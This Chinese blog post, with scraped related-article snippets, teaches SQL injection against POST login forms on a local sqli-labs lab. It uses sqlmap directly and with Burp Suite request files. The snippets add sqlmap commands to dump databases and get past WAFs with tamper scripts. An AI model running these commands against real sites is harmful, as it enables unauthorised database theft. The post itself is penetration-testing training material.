sql注入sqlmap结合burpsuite进行注入-http post

最新推荐文章于 2025-05-07 20:20:23 发布
最新推荐文章于 2025-05-07 20:20:23 发布
阅读量1k 收藏 1
点赞数
分类专栏: web安全-sql注入 文章标签: http sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_54217950/article/details/123006161
版权

第一种方法

form表单提交注入
方法还是通过常用的报错注入函数进行注入,只不过变成了post提交from表单的形式进行。
在这里插入图片描述

第二种方法:burpsuite

在这里插入图片描述

第三种sqlmap进行注入

把数据以POST方式提交,sqlmap会像检测GET参数一样检测POST的参数。

D:\python\PYTHON\sqlmap>python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-13/?id=1" --data="uname=admin&passwd=aaaaaa&submit=submit"   -v 3  --dbs

结果:
在这里插入图片描述

第三种:sqlmap和burpsuite结合

将burpsuite抓取的信息以txt文本形式放在本地
在这里插入图片描述
使用sqlmap进行注入
运行sqlmap,输入命令:参数 -r 是让sqlmap加载我们的post请求rsearch-test.txt -dbs是获取命令参数。我们以获取当前数据库为例子

D:\python\PYTHON>python sqlmap/sqlmap.py -r aaa.txt -dbs
注意:要获取其他内容我们通过sqlmap加不同命令参数即可。

结果

在这里插入图片描述

使用sqlmap+burpsuite进行中级sql注入
shatianyzg的博客
06-01 379
使用sqlmap+burpsuite进行中级sql注入
SQL注入工具-----sqlmap
追求卓越,技术流~
10-25 3851
合天网安笔记 利用sqlmap进行文件的读写 简介:sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post ,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 第一步:首先设置好靶机 打开http:10.1.1.136,输入用户名:admin 密码:password 登入 找到SQL Injection随意输入一个数,打开burpsuite进行抓包,点
安全工具 | 一次改SQLMAP的操作
zkaq7777777的博客
05-28 575
sqlmap这个工具,相信各位大佬们都不陌生,但sqlmap虽好,也时常会有些实际存在但无法注入的地方,这时候就需要我们改它的配置了,今天就以本人遇到的事件进行阐述。
信息安全之使用Burpsuite进行SQL注入安全实验
最新发布
HENANwuyanzu66的博客
05-07 1015
本文介绍了如何使用Burpsuite以及DVWA进行SQL注入测试,包括准备工作、发现潜在注入点、验证注入类型及利用漏洞获取数据的方法。
SQLMap工具与Burpsuite信息联动
fzy2003的博客
07-03 2606
通过本次实验,成功实现了SQLMap调用burpsuit代理抓包信息进行SQL注入,掌握如何高效利用其它工具信息来进行SQL注入
burpsuite配合sqlmap自动sql注入探测
sojrs_sec的博客
12-31 2327
环境macbook Python Sqlmap Burp suite1.7.37 一:安装sqlmap Git clone https://github.com/sqlmapproject/sqlmap.git 放置在/opt/sqlmap目录 Vim ~/.bash_profile 添加 alias sqlmap='python /opt/sqlmap/sqlmap.py’ 保存 Source ...
Web渗透之Web利器合集——sqlmapburpsuite连接
Mr_Wanderer的博客
07-21 1109
文章目录burp将数据包内容存储到日志文件,由sqlmap处理设置burp把记录的log文件放sqlmap目录下sqlmap跑包最后能注入的url会保存到out文件夹下burp调用sqlmapburp安装插件抓包,发送到SQLMapper![在这里插入图片描述](https://img-blog.csdnimg.cn/20200721221219701.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0
Burpsuite 联合 sqlmap
weixin_42751423的博客
05-08 332
文章参考 https://www.cnblogs.com/yoyoyang/p/11811346.html 新版本burpsuite
Burpsuite插件之chunked-coding-converter使用方法1
08-03
3. 使用sqlmap进行测试,比如执行POST注入攻击。 4. sqlmap运行后,Burp Suite的代理会捕获到相关的HTTP请求。 5. 在Burp Suite的历史记录中找到相关的请求,检查是否包含`Transfer-Encoding: chunked`的头部。如果...
burp爆破mysql_[技巧]使用Burpsuite辅助Sqlmap进行POST注入测试
weixin_28877505的博客
01-26 935
我们在使用Sqlmap进行post注入时,经常会出现请求遗漏导致注入失败的情况。这里分享一个小技巧,即结合burpsuite来使用sqlmap,用这种方法进行post注入测试会更准确,操作起来也非常容易。1.浏览器打开目标地址http://testasp.vulnweb.com/Login.asp2.配置burp代理(127.0.0.1:8080)以拦截请求3.点击login表单的sub...
Burp suite和Sqlmap入门
SH1OCK
07-28 829
Burp suite和Sqlmap入门 弱口令爆破 应用场景 系统密码包含大量弱口令,诸如12345、abc、账号密码相同,攻击者就可以利用该漏洞获取较高权限账号 爆破工具 Burp Suite,常用功能抓包(Proxy)、重放(Repeater)、爆破(Intruder) 常用功能介绍 Prox Repeater 手动点击Go一键发送请求的组件 Intruder 本次重点介绍Intruder组件,Intruder组件拥有4个模块,分别是Target、Positions、Pa
SQL注入-10】cookie注入案例—以Sqli-labs靶机第less20关为例(借助BurpSuite工具)
m0_64378913的博客
05-06 2190
目录1 cookie注入概述2 cookie注入案例2.1 实验平台2.2 实验过程3.1 前戏 1 cookie注入概述 定义:cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数以cookie的方式提交。 一般的注入我们是使用get或者post方式提交: get方式提交就是直接在网址后面加上需要注入的语句; post则是通过表单方式, get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。 2 cookie注入案例 2.1 实验平台 靶机:Ce
Burpsuite配合Sqlmap进行SQL注入
多喝i热水的博客
01-25 2267
目录 Burpsuite抓包 Sqlmap判断注入点 爆破数据 【第一步:查询当前数据库】 ​【第二步:查询表】 ​【第三步:查询列名】 ​【第四步:查询内容】 Burpsuite抓包 Sqlmap判断注入点 python2 sqlmap.py -r D:\SecureTool\phpstudy_pro\WWW\sqli-labs-master\Less-11\use.txt - --batch 爆破数据 【第一步:查询当前数据库】 python2 sqlmap.py.
sqlmap结合burpsuitepost请求进行注入测试
weixin_30951231的博客
01-12 991
1.浏览器打开目标地址http://testasp.vulnweb.com/Login.asp 2.配置burp代理(127.0.0.1:8080)以拦截请求 3.点击login表单的submit按钮 4.如下图,这时候Burp会拦截到了我们的登录POST请求 5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下 ...
oracle sql查询时间_「Burpsuite练兵场」SQL注入及相关实验(二)
weixin_39715652的博客
12-04 211
Burpsuite练兵场系列文章更新啦,今天的内容是延续上期关于SQL注入及相关实验的讲解,对实验感兴趣的小伙伴千万别错过了呦!上期回顾「Burpsuite练兵场」SQL注入及相关实验(一)上节内容介绍了一些基础的SQL注入操作,这一节实验学习的内容为如何在探查到了SQL注入点后利用漏洞获取到数据库信息。通过SQL注入获取数据库信息获取数据库的关键信息,如数据库中的表和列需要访问保存描述各种数据库...
burpsuitesqlmap
Tian
08-04 2215
burpsuite版本:pro v2021.7 在线测试靶机地址demo.testfire.net/index.jsp 1、安装并启动burpsuite后,进入“Extender-BApp Store"菜单,搜索“sqlmap”,有4个结果 第一个SQLiPy Sqlmap Integration仅包含sqlmap插件功能;本文以安装第三个CO2,集成了多个插件功能为例。 选择第三个后,右侧窗口往下滑,点击Install即可安装。安装成功后需重启程序。重启后一级菜单出现CO2 2、使用..
Burpsuite插件系列之sqlmap
2301_80115097的博客
10-18 1164
1.启动Burp Suite,选择Extender–》BApp Store,搜索框搜索sqlmap选中SQLipy Sqlmap Integration如下图我们可以看到安装此插件所需环境依赖。发送到SQLipy Scan2.这里我们可以看到,插件自动提取了测试URL及Cookie等参数。喜欢的小伙伴点点关注,可留言想了解的相关知识包括但不限于(云计算、网络安全、数据安全等)2.这里我们可以看到,插件自动提取了测试URL及Cookie等参数。6.在安装好的插件中改为一样的端口,并启动。
burpsuite集成sqlmap插件
驻足
05-02 3825
我的独立博客 Marsguest’s Blog burpsuite集成sqlmap插件 环境搭建 1.python 2 2.burpsuite 3.sqlmap 4.sqlmap.jar python 2 安装及配置 首先到 这里 下载与你电脑相对应的python2版本 之后点开安装默认路径一路next就好 python 2环境变量配置(win10) 点开我的电脑...
使用Burpsuite辅助Sqlmap进行POST注入测试
kuxing100的专栏
03-28 2577
原文:http://www.freebuf.com/tools/2311.html 辅助:http://club.freebuf.com/?/question/154 我们在使用Sqlmap进行post注入时,经常会出现请求遗漏导致注入失败的情况。 这里分享一个小技巧,即结合burpsuite来使用sqlmap,用这种方法进行post注入测试会更准确,操作起来也非常容易。 1
sqlmap怎么注入post
05-02
<think>好的,用户现在想了解如何使用sqlmapPOST请求进行SQL注入测试。之前已经讨论过sqlmap--technique参数,用户可能已经对sqlmap的基础有了一定了解。现在需要详细说明POST注入的具体步骤和方法。 首先,我需要参考用户提供的站内引用,特别是引用[2]、[3]和[4],因为它们直接提到了POST注入的操作步骤。引用[2]提到使用Burp Suite拦截POST请求并保存为txt文件,然后用sqlmap-r参数加载。引用[3]和[4]也提到了类似的步骤,比如使用-r参数指定请求文件,以及使用--data参数直接传递POST数据。 用户的问题集中在POST请求的测试流程,所以需要分步骤解释,从准备请求数据开始,包括使用Burp Suite抓包或者手动构建POST数据。然后介绍sqlmap的不同命令参数,比如--data和-r的区别,以及常用的选项如-p指定参数,--batch自动执行,--dbs获取数据库等。 还需要注意用户可能的疑惑点,比如如何确定注入点参数,是否需要处理Cookie或Headers,以及不同场景下的实际案例,比如登录表单或搜索功能。此外,结合之前的回答提到的--technique参数,可能需要提醒用户根据实际情况调整注入技术以提高效率。 最后,要确保回答结构清晰,步骤明确,并附上相关问题,帮助用户进一步学习。同时,要检查引用是否正确,比如引用[2]提到结合Burp Suite和-r参数,引用[3]中的各种命令示例,引用[4]中的实例操作,确保信息准确无误。</think>以下是通过sqlmap进行POST请求SQL注入测试的详细步骤,结合Burp Suite和直接命令行两种方式实现: ### 一、准备POST请求数据 #### 方法1:Burp Suite抓包 1. **配置代理** Burp Suite设置监听端口(如`127.0.0.1:8080`),浏览器配置相同代理[^2] 2. **拦截请求** 提交目标表单(如登录/搜索),Burp Suite会捕获类似请求: ```http POST /login.php HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded username=test&password=123 ``` 3. **保存请求文件** 将完整请求内容保存为`.txt`文件(如`post.txt`)[^4] #### 方法2:手动构建请求 直接通过`--data`参数传递POST数据: ```bash sqlmap -u "http://example.com/login.php" --data="username=test&password=123" ``` --- ### 二、注入测试命令 #### 基础命令 ```bash sqlmap -r post.txt -p "username" --batch --dbs ``` - `-r`:加载含POST请求的抓包文件[^2][^4] - `-p`:指定测试参数(如`username`字段) - `--batch`:自动选择默认选项[^3] - `--dbs`:枚举数据库 --- ### 三、进阶操作 #### 1. 指定注入点 若参数包含特殊字符(如`json={...}`),需用`*`标记注入位置: ```http POST /api HTTP/1.1 Content-Type: application/json {"user":"test*","token":"abc"} ``` 命令行: ```bash sqlmap -r post.txt -p "user" ``` #### 2. Cookie/Header处理 需要认证时添加`--cookie`或`--headers`: ```bash sqlmap -u "http://example.com/search" --data="keyword=test" --cookie="PHPSESSID=abc123" --level=3 ``` #### 3. 结果提取 | 命令参数 | 功能 | 示例输出 | |------------------|---------------------------|--------------------------| | `--current-db` | 获取当前数据库 | `current database: 'testdb'` | | `-D testdb --tables` | 列举数据库表 | `[2 tables] users, orders` | | `-T users --columns` | 获取表字段 | `id, username, password` | | `--dump` | 导出数据 | 显示所有记录内容 | --- ### 四、典型场景案例 #### 案例1:登录表单注入 ```bash sqlmap -r login.txt -p "password" --technique=BE --risk=3 ``` - `--technique=BE`:布尔/时间盲注组合 - `--risk=3`:启用危险操作(如`OR 1=1`) #### 案例2:JSON格式注入 ```bash sqlmap -u "http://api.example.com" --data='{"id":1}' --headers="Content-Type: application/json" --level=5 ``` --- ### 五、常见问题处理 1. **请求遗漏** 确保抓包文件包含完整的`Host`和`Content-Type`头部[^2] 2. **WAF绕过** 添加`--tamper=space2comment`等脚本混淆payload 3. **速度优化** ```bash sqlmap -r post.txt --threads=5 --optimize ``` --- ### 六、综合操作流程图 ```mermaid graph TD A[启动Burp Suite抓包] --> B{是否含动态参数?} B -->|是| C[保存为post.txt] B -->|否| D[手动构建--data参数] C --> E[执行sqlmap -r post.txt] D --> E E --> F[分析注入结果] ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值